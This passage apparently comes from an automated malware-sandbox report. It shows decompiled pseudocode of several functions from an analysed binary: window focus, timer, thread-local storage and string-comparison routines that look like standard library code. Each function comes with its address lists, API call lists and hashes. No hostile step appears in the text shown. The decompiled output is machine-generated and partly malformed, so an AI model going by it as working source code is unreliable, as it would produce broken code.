				struct HWND__* _v8;
				void* __edi;
				void* _t12;
				void* _t14;
				void* _t15;
				void* _t18;
				void* _t19;
				void* _t29;
				struct HWND__* _t30;
				signed int _t34;
				void* _t37;
				void* _t41;

				_t29 = __ebx;
				_push(__ecx);
				_t37 = __ecx;
				_t12 = E004105B2(__ebx, __ecx, __ecx);
				_t34 = _a4 & 0x0000fff0;
				_t41 = _t12;
				_t14 = _t34 - 0xf040;
				if(_t14 == 0) {
					L11:
					if(_a8 != 0x75 || _t41 == 0) {
						L15:
						_t15 = 0;
						goto L16;
					} else {
						E00412C9D(_t41);
						L14:
						_t15 = 1;
						L16:
						return _t15;
					}
				}
				_t18 = _t14 - 0x10;
				if(_t18 == 0) {
					goto L11;
				}
				_t19 = _t18 - 0x10;
				if(_t19 == 0 || _t19 == 0xa0) {
					if(_t34 == 0xf060 || _a8 != 0) {
						if(_t41 != 0) {
							_push(_t29);
							_t30 =  *(_t37 + 0x20);
							_v8 = GetFocus();
							E0040EE3C(_t30, _t34, SetActiveWindow( *(_t41 + 0x20)));
							SendMessageA( *(_t41 + 0x20), 0x112, _a4, _a8);
							if(IsWindow(_t30) != 0) {
								SetActiveWindow(_t30);
							}
							if(IsWindow(_v8) != 0) {
								SetFocus(_v8);
							}
						}
					}
					goto L14;
				} else {
					goto L15;
				}
			}















                  0x004105da
                  0x004105df
                  0x004105e2
                  0x004105e4
                  0x004105ec
                  0x004105f2
                  0x004105f6
                  0x004105fb
                  0x0041067b
                  0x00410680
                  0x00410692
                  0x00410692
                  0x00000000
                  0x00410686
                  0x00410688
                  0x0041068d
                  0x0041068f
                  0x00410694
                  0x00410697
                  0x00410697
                  0x00410680
                  0x004105fd
                  0x00410600
                  0x00000000
                  0x00000000
                  0x00410602
                  0x00410605
                  0x00410618
                  0x00410622
                  0x00410624
                  0x00410625
                  0x00410637
                  0x0041063d
                  0x00410650
                  0x00410661
                  0x00410664
                  0x00410664
                  0x0041066e
                  0x00410673
                  0x00410673
                  0x0041066e
                  0x00410622
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Window$ActiveFocus$MessageSend
                  • String ID: u
                  • API String ID: 1556911595-4067256894
                  • Opcode ID: 87418f2dc2a614755a69d5c0f0d4f683a1a68f3be1b47742967ac6949befff1e
                  • Instruction ID: b4a469e61909f79723e9443e387843b1e68923f1b743ae53d2218e8cd4b0e9e5
                  • Opcode Fuzzy Hash: 87418f2dc2a614755a69d5c0f0d4f683a1a68f3be1b47742967ac6949befff1e
                  • Instruction Fuzzy Hash: 1A11B432500205ABDB346F76CD08AEF7B65FBC4310F054436E905926A2DAB8CDE0DA98
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00421287, Relevance: 13.6, APIs: 9, Instructions: 131timekeyboardCOMMON
                  Download Yara Rule
                  C-Code - Quality: 98%
                  			E00421287(intOrPtr* __ecx, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				struct tagPOINT _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t42;
				signed int _t49;
				struct HWND__* _t60;
				intOrPtr _t63;
				intOrPtr* _t64;
				intOrPtr _t66;
				void* _t68;
				void* _t72;
				intOrPtr* _t75;
				intOrPtr _t83;
				void* _t84;
				intOrPtr _t85;
				struct HWND__* _t87;
				intOrPtr _t88;
				intOrPtr* _t89;

				_t76 = __ecx;
				_t89 = __ecx;
				_t42 = GetKeyState(1);
				_t90 = _t42;
				if(_t42 < 0) {
					return _t42;
				}
				_t85 = E0041F396(_t72, _t76, _t84, _t89, _t90);
				_v12 = _t85;
				GetCursorPos( &_v20);
				ScreenToClient( *(_t89 + 0x20),  &_v20);
				_t49 =  *((intOrPtr*)( *_t89 + 0x74))(_v20.x, _v20.y, 0, _t84, _t72);
				_v8 = _t49;
				if(_t49 < 0) {
					_t16 = _t85 + 0x4c;
					 *_t16 =  *(_t85 + 0x4c) | 0xffffffff;
					__eflags =  *_t16;
					L18:
					if(_v8 < 0) {
						L27:
						if( *(_v12 + 0x4c) == 0xffffffff) {
							KillTimer( *(_t89 + 0x20), 0xe001);
						}
						 *((intOrPtr*)( *_t89 + 0x178))(0xffffffff);
						L30:
						_t53 = 0xe000;
						if(_a4 == 0xe000) {
							_t53 = KillTimer( *(_t89 + 0x20), 0xe000);
							if(_v8 >= 0) {
								_t53 =  *((intOrPtr*)( *_t89 + 0x178))(_v8);
							}
						}
						return _t53;
					}
					ClientToScreen( *(_t89 + 0x20),  &_v20);
					_push(_v20.y);
					_t87 = WindowFromPoint(_v20);
					if(_t87 == 0) {
						L25:
						_t59 = _v12;
						_v8 = _v8 | 0xffffffff;
						 *(_t59 + 0x4c) =  *(_v12 + 0x4c) | 0xffffffff;
						L26:
						if(_v8 >= 0) {
							goto L30;
						}
						goto L27;
					}
					_t60 =  *(_t89 + 0x20);
					if(_t87 == _t60 || IsChild(_t60, _t87) != 0) {
						goto L26;
					} else {
						_t63 =  *((intOrPtr*)(_v12 + 0x3c));
						if(_t63 != 0) {
							_t63 =  *((intOrPtr*)(_t63 + 0x20));
						}
						if(_t63 == _t87) {
							goto L26;
						} else {
							goto L25;
						}
					}
				}
				_t64 = E004105B2(_t72, _t89, _t85);
				_t81 = _t89;
				_t75 = _t64;
				if(E004117D8(_t89) == 0) {
					L6:
					_v8 = _v8 | 0xffffffff;
					goto L7;
				} else {
					_t93 = _t75;
					if(_t75 == 0) {
						E00406436(_t75, _t81, _t85, _t89, _t93);
					}
					_t81 = _t75;
					if(E00412C5B(_t75) != 0) {
						L7:
						_t66 =  *((intOrPtr*)(_t85 + 0x3c));
						if(_t66 != 0) {
							_t88 =  *((intOrPtr*)(_t66 + 0x20));
						} else {
							_t88 = 0;
						}
						_t68 = E0040EE3C(_t75, _t81, GetCapture());
						if(_t68 != _t89) {
							if(_t68 != 0) {
								_t83 =  *((intOrPtr*)(_t68 + 0x20));
							} else {
								_t83 = 0;
							}
							if(_t83 != _t88 && E004105B2(_t75, _t68, _t88) == _t75) {
								_v8 = _v8 | 0xffffffff;
							}
						}
						goto L18;
					}
					goto L6;
				}
			}

























                  0x00421287
                  0x00421292
                  0x00421294
                  0x0042129a
                  0x0042129d
                  0x004213f0
                  0x004213f0
                  0x004212aa
                  0x004212b0
                  0x004212b3
                  0x004212c0
                  0x004212d2
                  0x004212d5
                  0x004212da
                  0x00421346
                  0x00421346
                  0x00421346
                  0x0042134a
                  0x00421354
                  0x004213aa
                  0x004213b1
                  0x004213bb
                  0x004213bb
                  0x004213c3
                  0x004213c9
                  0x004213c9
                  0x004213d1
                  0x004213d7
                  0x004213dd
                  0x004213e6
                  0x004213e6
                  0x004213dd
                  0x00000000
                  0x004213ed
                  0x0042135d
                  0x00421363
                  0x0042136f
                  0x00421373
                  0x00421399
                  0x00421399
                  0x0042139c
                  0x004213a0
                  0x004213a4
                  0x004213a8
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004213a8
                  0x00421375
                  0x0042137a
                  0x00000000
                  0x00421388
                  0x0042138b
                  0x00421390
                  0x00421392
                  0x00421392
                  0x00421397
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00421397
                  0x0042137a
                  0x004212de
                  0x004212e3
                  0x004212e5
                  0x004212ee
                  0x00421304
                  0x00421304
                  0x00000000
                  0x004212f0
                  0x004212f0
                  0x004212f2
                  0x004212f4
                  0x004212f4
                  0x004212f9
                  0x00421302
                  0x00421308
                  0x00421308
                  0x0042130d
                  0x00421313
                  0x0042130f
                  0x0042130f
                  0x0042130f
                  0x0042131d
                  0x00421324
                  0x00421328
                  0x0042132e
                  0x0042132a
                  0x0042132a
                  0x0042132a
                  0x00421333
                  0x00421340
                  0x00421340
                  0x00421333
                  0x00000000
                  0x00421324
                  0x00000000
                  0x00421302

                  APIs
                  • GetKeyState.USER32(00000001), ref: 00421294
                  • GetCursorPos.USER32(?), ref: 004212B3
                  • ScreenToClient.USER32 ref: 004212C0
                  • GetCapture.USER32 ref: 00421316
                    • Part of subcall function 00406436: __CxxThrowException@8.LIBCMT ref: 0040644C
                    • Part of subcall function 00406436: __EH_prolog3.LIBCMT ref: 00406459
                  • ClientToScreen.USER32(?,?), ref: 0042135D
                  • WindowFromPoint.USER32(?,?), ref: 00421369
                  • IsChild.USER32(?,00000000), ref: 0042137E
                  • KillTimer.USER32(?,0000E001), ref: 004213BB
                  • KillTimer.USER32(?,0000E000), ref: 004213D7
                    • Part of subcall function 004117D8: GetForegroundWindow.USER32 ref: 004117EC
                    • Part of subcall function 004117D8: GetLastActivePopup.USER32(?), ref: 004117FD
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: ClientKillScreenTimerWindow$ActiveCaptureChildCursorException@8ForegroundFromH_prolog3LastPointPopupStateThrow
                  • String ID:
                  • API String ID: 1544770960-0
                  • Opcode ID: 4a07689c9db685bc27bb4ffb24f0be35f979112e1c51394de2fbae732337afbb
                  • Instruction ID: df39ac5b8854794e06a7082f429ff7eac5bcf5f3c278d8809952c039e30c033c
                  • Opcode Fuzzy Hash: 4a07689c9db685bc27bb4ffb24f0be35f979112e1c51394de2fbae732337afbb
                  • Instruction Fuzzy Hash: F641C631700215EFEB20DBA6DD44AAE7BB6BF54324F50066AE851D76B1EB38DD41CB08
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 004208A9, Relevance: 13.6, APIs: 9, Instructions: 96memoryCOMMONLIBRARYCODE
                  Download Yara Rule
                  C-Code - Quality: 83%
                  			E004208A9(void* __ebx, long* __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t36;
				void* _t39;
				long _t41;
				void* _t42;
				long _t47;
				void* _t53;
				signed int _t55;
				long* _t62;
				struct _CRITICAL_SECTION* _t64;
				void* _t65;
				void* _t66;

				_push(0x10);
				E00431ACE(E0044BED8, __ebx, __edi, __esi);
				_t62 = __ecx;
				 *((intOrPtr*)(_t66 - 0x18)) = __ecx;
				_t64 = __ecx + 0x1c;
				 *(_t66 - 0x14) = _t64;
				EnterCriticalSection(_t64);
				_t36 =  *(_t66 + 8);
				if(_t36 <= 0 || _t36 >= _t62[3]) {
					_push(_t64);
				} else {
					_t65 = TlsGetValue( *_t62);
					if(_t65 == 0) {
						 *(_t66 - 4) = 0;
						_t39 = E00420529(0x10);
						__eflags = _t39;
						if(__eflags == 0) {
							_t65 = 0;
							__eflags = 0;
						} else {
							 *_t39 = 0x453424;
							_t65 = _t39;
						}
						 *(_t66 - 4) =  *(_t66 - 4) | 0xffffffff;
						_t51 =  &(_t62[5]);
						 *(_t65 + 8) = 0;
						 *(_t65 + 0xc) = 0;
						E0042065B( &(_t62[5]), _t65);
						goto L5;
					} else {
						_t55 =  *(_t66 + 8);
						if(_t55 >=  *(_t65 + 8) &&  *((intOrPtr*)(_t66 + 0xc)) != 0) {
							L5:
							_t75 =  *(_t65 + 0xc);
							if( *(_t65 + 0xc) != 0) {
								_t41 = E004148C1(_t51, __eflags, _t62[3], 4);
								_t53 = 2;
								_t42 = LocalReAlloc( *(_t65 + 0xc), _t41, ??);
							} else {
								_t47 = E004148C1(_t51, _t75, _t62[3], 4);
								_pop(_t53);
								_t42 = LocalAlloc(0, _t47);
							}
							_t76 = _t42;
							if(_t42 == 0) {
								LeaveCriticalSection( *(_t66 - 0x14));
								_t42 = E004063FE(0, _t53, _t62, _t65, _t76);
							}
							 *(_t65 + 0xc) = _t42;
							E00431160(_t62, _t42 +  *(_t65 + 8) * 4, 0, _t62[3] -  *(_t65 + 8) << 2);
							 *(_t65 + 8) = _t62[3];
							TlsSetValue( *_t62, _t65);
							_t55 =  *(_t66 + 8);
						}
					}
					_t36 =  *(_t65 + 0xc);
					if(_t36 != 0 && _t55 <  *(_t65 + 8)) {
						 *((intOrPtr*)(_t36 + _t55 * 4)) =  *((intOrPtr*)(_t66 + 0xc));
					}
					_push( *(_t66 - 0x14));
				}
				LeaveCriticalSection();
				return E00431B73(_t36);
			}














                  0x004208a9
                  0x004208b0
                  0x004208b5
                  0x004208b7
                  0x004208ba
                  0x004208be
                  0x004208c1
                  0x004208c7
                  0x004208ce
                  0x004209cf
                  0x004208dd
                  0x004208e5
                  0x004208e9
                  0x0042091d
                  0x00420920
                  0x00420925
                  0x00420927
                  0x00420933
                  0x00420933
                  0x00420929
                  0x00420929
                  0x0042092f
                  0x0042092f
                  0x00420935
                  0x0042093a
                  0x0042093d
                  0x00420940
                  0x00420943
                  0x00000000
                  0x004208eb
                  0x004208eb
                  0x004208f1
                  0x00420900
                  0x00420900
                  0x00420903
                  0x00420967
                  0x0042096d
                  0x00420972
                  0x00420905
                  0x0042090a
                  0x00420910
                  0x00420913
                  0x00420913
                  0x00420978
                  0x0042097a
                  0x0042097f
                  0x00420985
                  0x00420985
                  0x0042098d
                  0x0042099e
                  0x004209aa
                  0x004209af
                  0x004209b5
                  0x004209b5
                  0x004208f1
                  0x004209b8
                  0x004209bd
                  0x004209c7
                  0x004209c7
                  0x004209ca
                  0x004209ca
                  0x004209d0
                  0x004209db

                  APIs
                  • __EH_prolog3_catch.LIBCMT ref: 004208B0
                  • EnterCriticalSection.KERNEL32(?,00000010,00420B6C,?,00000000,?,00000004,0041F372,00406452,00411FA3), ref: 004208C1
                  • TlsGetValue.KERNEL32(?,?,00000000,?,00000004,0041F372,00406452,00411FA3), ref: 004208DF
                  • LocalAlloc.KERNEL32(00000000,00000000,00000000,00000010,?,?,00000000,?,00000004,0041F372,00406452,00411FA3), ref: 00420913
                  • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,0041F372,00406452,00411FA3), ref: 0042097F
                  • _memset.LIBCMT ref: 0042099E
                  • TlsSetValue.KERNEL32(?,00000000,0041F372,00406452,00411FA3), ref: 004209AF
                  • LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,0041F372,00406452,00411FA3), ref: 004209D0
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: CriticalSection$LeaveValue$AllocEnterH_prolog3_catchLocal_memset
                  • String ID:
                  • API String ID: 1891723912-0
                  • Opcode ID: 7f57efcd963ca449d36f0365ecac5dd69b34fcef90cf9d521c33b0f43bbe3d9f
                  • Instruction ID: 5362d1717d03bc6381155a69efb60a9799305f1a3338e288a41fad99fcfcfd1f
                  • Opcode Fuzzy Hash: 7f57efcd963ca449d36f0365ecac5dd69b34fcef90cf9d521c33b0f43bbe3d9f
                  • Instruction Fuzzy Hash: 683192B5600616AFEB20AF11E881D6AB7F4FF44310B50C52FF51797662C774A990CF88
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 004289FF, Relevance: 13.6, APIs: 9, Instructions: 86stringCOMMON
                  Download Yara Rule
                  C-Code - Quality: 82%
                  			E004289FF(void* __esi, char* _a4, CHAR* _a8) {
				signed int _v8;
				short _v528;
				short _v1048;
				short _v1568;
				int _v1572;
				char* _v1576;
				void* __ebx;
				void* __edi;
				signed int _t20;
				int _t23;
				void* _t26;
				char* _t35;
				CHAR* _t38;
				void* _t39;
				int _t40;
				void* _t45;
				char* _t47;
				void* _t48;
				void* _t52;
				signed int _t55;
				signed int _t57;

				_t49 = __esi;
				_t55 = _t57;
				_t20 =  *0x463404; // 0x18eab29f
				_v8 = _t20 ^ _t55;
				_t38 = _a8;
				_t47 = _a4;
				_v1576 = _t38;
				if(lstrcmpiA(_t47, _t38) == 0) {
					_t23 = GetSystemMetrics(0x2a);
					if(_t23 != 0) {
						_push(__esi);
						_v1572 = lstrlenA(_t47);
						if(_v1572 != lstrlenA(_t38)) {
							L14:
							_t26 = 0;
						} else {
							_t40 = GetThreadLocale();
							GetStringTypeA(_t40, 1, _t47, 0xffffffff,  &_v1568);
							GetStringTypeA(_t40, 4, _t47, 0xffffffff,  &_v528);
							GetStringTypeA(_t40, 1, _v1576, 0xffffffff,  &_v1048);
							_t35 = _t47;
							if( *_t47 == 0) {
								L11:
								_t26 = 1;
							} else {
								_t52 = 0;
								while(( *(_t55 + _t52 - 0x20c) & 0x00000080) == 0 ||  *((intOrPtr*)(_t55 + _t52 - 0x61c)) ==  *((intOrPtr*)(_t55 + _t52 - 0x414))) {
									_t52 = _t52 + 2;
									if( *_t35 != 0) {
										continue;
									} else {
										goto L11;
									}
									goto L12;
								}
								goto L14;
							}
						}
						L12:
						_pop(_t49);
					} else {
						_t26 = _t23 + 1;
					}
				} else {
					_t26 = 0;
				}
				_pop(_t48);
				_pop(_t39);
				return E00430650(_t26, _t39, _v8 ^ _t55, _t45, _t48, _t49);
			}
























                  0x004289ff
                  0x00428a02
                  0x00428a0a
                  0x00428a11
                  0x00428a15
                  0x00428a19
                  0x00428a1e
                  0x00428a2c
                  0x00428a37
                  0x00428a3f
                  0x00428a47
                  0x00428a52
                  0x00428a60
                  0x00428aed
                  0x00428aed
                  0x00428a66
                  0x00428a72
                  0x00428a81
                  0x00428a90
                  0x00428aa4
                  0x00428aa9
                  0x00428aab
                  0x00428ad9
                  0x00428adb
                  0x00428aad
                  0x00428aad
                  0x00428aaf
                  0x00428acd
                  0x00428ad7
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00428ad7
                  0x00000000
                  0x00428aaf
                  0x00428aab
                  0x00428adc
                  0x00428adc
                  0x00428a41
                  0x00428a41
                  0x00428a41
                  0x00428a2e
                  0x00428a2e
                  0x00428a2e
                  0x00428ae0
                  0x00428ae3
                  0x00428aea

                  APIs
                  • lstrcmpiA.KERNEL32(00000000,00000000,00000000,?), ref: 00428A24
                  • GetSystemMetrics.USER32 ref: 00428A37
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: MetricsSystemlstrcmpi
                  • String ID:
                  • API String ID: 2335526769-0
                  • Opcode ID: e080c02de74fd4b82b430f72ec3c9409b302c346e750a8042bb942049da280ed
                  • Instruction ID: 79ccf1a60a629e09d7d33ca9d5b2f7e3e78f3aa6161d4a5aaa64ec7c091d6d26
                  • Opcode Fuzzy Hash: e080c02de74fd4b82b430f72ec3c9409b302c346e750a8042bb942049da280ed
                  • Instruction Fuzzy Hash: 47210E717012286BDB205F65AC44F9F7BACEB89720F5006BBF916D21C1DEB49D41CB68
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0041804C, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 164stringCOMMON
                  Download Yara Rule
                  C-Code - Quality: 93%
                  			E0041804C(void* __ebx, void* __ecx, void* __edx, void* __edi, signed short* __esi, void* __eflags) {
				signed int _t83;
				intOrPtr _t85;
				void* _t91;
				intOrPtr _t96;
				CHAR** _t98;
				signed int _t101;
				signed int _t103;
				signed int _t108;
				intOrPtr _t110;
				CHAR** _t117;
				int _t120;
				CHAR** _t122;
				int _t125;
				signed int _t126;
				void* _t130;
				void* _t135;
				void* _t148;
				signed int _t150;
				void* _t152;
				signed short* _t156;

				_t151 = __esi;
				_t148 = __edx;
				_t131 = __ecx;
				_push(0x188);
				E00431A9B(E0044B616, __ebx, __edi, __esi);
				_t130 = __ecx;
				_t150 = 0;
				 *(_t152 - 0x10) = 0;
				if( *((intOrPtr*)(_t152 + 8)) != 0) {
					L29:
					_push(_t150);
					_push(0x14000c);
					_push(1);
					E0042A201(_t130, _t152 - 0x194, _t150, _t151, __eflags);
					 *(_t152 - 4) = 3;
					E0042A489(_t152 - 0x194);
					_t83 =  *(_t130 + 0x70);
					__eflags = _t83 - _t150;
					if(_t83 != _t150) {
						E0041FD19(_t83);
					}
					_t84 =  *(_t130 + 0x74);
					__eflags =  *(_t130 + 0x74) - _t150;
					if(__eflags != 0) {
						E0041FD19(_t84);
					}
					_t85 =  *((intOrPtr*)(_t152 - 0x120));
					 *(_t130 + 0x70) =  *(_t85 + 8);
					 *(_t130 + 0x74) =  *(_t85 + 0xc);
					 *((intOrPtr*)(_t152 - 0x194)) = 0x452264;
					_t76 = _t152 - 0x194; // 0x452264
					_t135 = _t76;
					L34:
					 *(_t152 - 4) =  *(_t152 - 4) | 0xffffffff;
					_t87 = E004174FB(_t135, _t150, _t151,  *(_t152 - 4));
					L35:
					return E00431B73(_t87);
				}
				_t91 =  *(__ecx + 0x74);
				if(_t91 == 0) {
					goto L29;
				}
				_t151 = GlobalLock(_t91);
				_t156 = _t151;
				_t87 = 0 | _t156 == 0x00000000;
				_t157 = _t156 == 0;
				if(_t156 == 0) {
					_t87 = E00406436(_t130, _t131, 0, _t151, _t157);
				}
				_t158 = _t151[3] & 0x00000001;
				if((_t151[3] & 0x00000001) == 0) {
					goto L35;
				}
				_push(_t150);
				_push(0x14000c);
				_push(1);
				E0042A201(_t130, _t152 - 0xd8, _t150, _t151, _t158);
				 *(_t152 - 4) = _t150;
				if(E0042A489(_t152 - 0xd8) != 0) {
					_t96 =  *((intOrPtr*)(_t152 - 0x64));
					__eflags =  *((intOrPtr*)(_t96 + 0xc)) - _t150;
					if( *((intOrPtr*)(_t96 + 0xc)) != _t150) {
						_t98 = E0042A49C(_t152 - 0xd8, _t152 - 0x18);
						_t150 = lstrcmpA;
						 *(_t152 - 4) = 1;
						 *(_t152 - 0x10) = 1;
						_t101 = lstrcmpA(_t151 + ( *_t151 & 0x0000ffff),  *_t98);
						__eflags = _t101;
						if(_t101 != 0) {
							L14:
							 *((char*)(_t152 + 0xb)) = 1;
							L15:
							__eflags =  *(_t152 - 0x10) & 0x00000004;
							if(( *(_t152 - 0x10) & 0x00000004) != 0) {
								 *(_t152 - 0x10) =  *(_t152 - 0x10) & 0xfffffffb;
								__eflags =  *((intOrPtr*)(_t152 - 0x1c)) + 0xfffffff0;
								E004010B0( *((intOrPtr*)(_t152 - 0x1c)) + 0xfffffff0, _t148);
							}
							__eflags =  *(_t152 - 0x10) & 0x00000002;
							if(( *(_t152 - 0x10) & 0x00000002) != 0) {
								 *(_t152 - 0x10) =  *(_t152 - 0x10) & 0xfffffffd;
								__eflags =  *((intOrPtr*)(_t152 - 0x14)) + 0xfffffff0;
								E004010B0( *((intOrPtr*)(_t152 - 0x14)) + 0xfffffff0, _t148);
							}
							 *(_t152 - 4) =  *(_t152 - 4) & 0x00000000;
							__eflags =  *(_t152 - 0x10) & 0x00000001;
							if(( *(_t152 - 0x10) & 0x00000001) != 0) {
								__eflags =  *((intOrPtr*)(_t152 - 0x18)) + 0xfffffff0;
								E004010B0( *((intOrPtr*)(_t152 - 0x18)) + 0xfffffff0, _t148);
							}
							__eflags =  *((char*)(_t152 + 0xb));
							if( *((char*)(_t152 + 0xb)) == 0) {
								_t103 =  *( *((intOrPtr*)(_t152 - 0x64)) + 8);
								__eflags = _t103;
								if(_t103 != 0) {
									E0041FD19(_t103);
								}
								_t105 =  *( *((intOrPtr*)(_t152 - 0x64)) + 0xc);
								__eflags =  *( *((intOrPtr*)(_t152 - 0x64)) + 0xc);
								if(__eflags != 0) {
									E0041FD19(_t105);
								}
							} else {
								_t108 =  *(_t130 + 0x70);
								__eflags = _t108;
								if(_t108 != 0) {
									E0041FD19(_t108);
								}
								E0041FD19( *(_t130 + 0x74));
								_t110 =  *((intOrPtr*)(_t152 - 0x64));
								 *(_t130 + 0x70) =  *(_t110 + 8);
								 *(_t130 + 0x74) =  *(_t110 + 0xc);
							}
							goto L6;
						}
						_t117 = E0042A4CF(_t152 - 0xd8, _t152 - 0x14);
						 *(_t152 - 4) = 2;
						 *(_t152 - 0x10) = 3;
						_t120 = lstrcmpA(_t151 + (_t151[1] & 0x0000ffff),  *_t117);
						__eflags = _t120;
						if(_t120 != 0) {
							goto L14;
						}
						_t122 = E0042A503(_t152 - 0xd8, _t152 - 0x1c);
						 *(_t152 - 0x10) = 7;
						_t125 = lstrcmpA(_t151 + (_t151[2] & 0x0000ffff),  *_t122);
						 *((char*)(_t152 + 0xb)) = 0;
						__eflags = _t125;
						if(_t125 == 0) {
							goto L15;
						}
						goto L14;
					}
					_t126 =  *(_t130 + 0x70);
					__eflags = _t126 - _t150;
					if(_t126 != _t150) {
						E0041FD19(_t126);
					}
					E0041FD19( *(_t130 + 0x74));
					 *(_t130 + 0x70) = _t150;
					 *(_t130 + 0x74) = _t150;
				}
				L6:
				 *((intOrPtr*)(_t152 - 0xd8)) = 0x452264;
				_t13 = _t152 - 0xd8; // 0x452264
				_t135 = _t13;
				goto L34;
			}























                  0x0041804c
                  0x0041804c
                  0x0041804c
                  0x0041804c
                  0x00418056
                  0x0041805b
                  0x0041805d
                  0x0041805f
                  0x00418065
                  0x00418216
                  0x00418216
                  0x00418217
                  0x0041821c
                  0x00418224
                  0x0041822f
                  0x00418236
                  0x0041823b
                  0x0041823e
                  0x00418240
                  0x00418243
                  0x00418243
                  0x00418248
                  0x0041824b
                  0x0041824d
                  0x00418250
                  0x00418250
                  0x00418255
                  0x0041825e
                  0x00418264
                  0x00418267
                  0x00418271
                  0x00418271
                  0x00418277
                  0x00418277
                  0x0041827b
                  0x00418280
                  0x00418285
                  0x00418285
                  0x0041806b
                  0x00418070
                  0x00000000
                  0x00000000
                  0x0041807d
                  0x00418081
                  0x00418083
                  0x00418086
                  0x00418088
                  0x0041808a
                  0x0041808a
                  0x0041808f
                  0x00418093
                  0x00000000
                  0x00000000
                  0x00418099
                  0x0041809a
                  0x0041809f
                  0x004180a7
                  0x004180b2
                  0x004180bc
                  0x004180d3
                  0x004180d6
                  0x004180d9
                  0x00418102
                  0x0041810c
                  0x00418115
                  0x00418119
                  0x00418120
                  0x00418122
                  0x00418124
                  0x0041817b
                  0x0041817b
                  0x0041817f
                  0x0041817f
                  0x00418183
                  0x00418188
                  0x0041818c
                  0x0041818f
                  0x0041818f
                  0x00418194
                  0x00418198
                  0x0041819d
                  0x004181a1
                  0x004181a4
                  0x004181a4
                  0x004181a9
                  0x004181ad
                  0x004181b1
                  0x004181b6
                  0x004181b9
                  0x004181b9
                  0x004181be
                  0x004181c2
                  0x004181f0
                  0x004181f3
                  0x004181f5
                  0x004181f8
                  0x004181f8
                  0x00418200
                  0x00418203
                  0x00418205
                  0x0041820c
                  0x0041820c
                  0x004181c4
                  0x004181c4
                  0x004181c7
                  0x004181c9
                  0x004181cc
                  0x004181cc
                  0x004181d4
                  0x004181d9
                  0x004181df
                  0x004181e5
                  0x004181e5
                  0x00000000
                  0x004181c2
                  0x00418130
                  0x0041813e
                  0x00418145
                  0x0041814c
                  0x0041814e
                  0x00418150
                  0x00000000
                  0x00000000
                  0x0041815c
                  0x0041816a
                  0x00418171
                  0x00418173
                  0x00418177
                  0x00418179
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00418179
                  0x004180db
                  0x004180de
                  0x004180e0
                  0x004180e3
                  0x004180e3
                  0x004180eb
                  0x004180f0
                  0x004180f3
                  0x004180f3
                  0x004180be
                  0x004180be
                  0x004180c8
                  0x004180c8
                  0x00000000

                  APIs
                  • __EH_prolog3.LIBCMT ref: 00418056
                  • GlobalLock.KERNEL32 ref: 00418077
                    • Part of subcall function 00406436: __CxxThrowException@8.LIBCMT ref: 0040644C
                    • Part of subcall function 00406436: __EH_prolog3.LIBCMT ref: 00406459
                  • lstrcmpA.KERNEL32(00000000,00000000,?,00000001,0014000C,00000000), ref: 00418120
                  • lstrcmpA.KERNEL32(?,00000000,?), ref: 0041814C
                  • lstrcmpA.KERNEL32(?,00000000,?), ref: 00418171
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
